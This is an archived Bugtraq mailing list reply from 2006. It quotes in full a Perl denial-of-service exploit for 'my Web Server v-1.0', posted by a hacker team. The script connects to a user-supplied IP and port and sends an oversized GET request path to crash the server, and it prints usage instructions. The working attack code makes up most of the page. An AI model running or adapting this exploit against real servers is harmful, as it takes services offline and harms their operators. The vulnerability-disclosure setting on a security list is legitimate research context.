Bugtraq mailing list archives
Re: my Web Server << v-1.0 Denial of Service Exploit
From: str0ke <str0ke () milw0rm com>
Date: Fri, 26 May 2006 14:09:31 -0500
Is this the same vulnerability? http://www.securityfocus.com/bid/5954 On 25 May 2006 13:35:13 -0000, s3rv3r_hack3r () yahoo com <s3rv3r_hack3r () yahoo com> wrote:
#!/usr/bin/perl #my Web Server << v-1.0 Denial of Service Exploit #vendor : Eitsop.s5.com use IO::Socket; use strict; my($socket) = ""; if($socket = IO::Socket::INET->new( PeerAddr => $ARGV[0], PeerPort => $ARGV[1], Proto => "TCP")) { print "++++++++++++++++++++++++++++++\n"; print "Connecting to $ARGV[0]:$ARGV[1] ...\n"; print "++++++++++++++++++++++++++++++\n"; print "Exploit Send successfuly!!\n"; print "++++++++++++++++++++++++++++++\n"; print $socket "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.0\r\n\r\n"; close($socket); } else { print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n"; print " ___ ___ __ \n"; print " / | \_____ ____ | | __ ___________________ \n"; print "/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / \n"; print "\ Y // __ \\ \___| <\ ___/| | \// / \n"; print " \___|_ /(____ )\___ >__|_ \\___ >__| /_____ \ \n"; print " \/ \/ \/ \/ \/ \/ \n"; print " Iran Hackerz Security Team \n"; print " WebSite's: www.hackerz.ir & www.h4ckerz.com \n"; print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n"; print "[Usage]perl myws.pl <IP> <Port> \n"; print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n"; print "[Status]Can Not Connect To >> $ARGV[0]:$ARGV[1] \n"; print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n"; } #EoF
Current thread:
- my Web Server << v-1.0 Denial of Service Exploit s3rv3r_hack3r (May 26)
- Re: my Web Server << v-1.0 Denial of Service Exploit str0ke (May 26)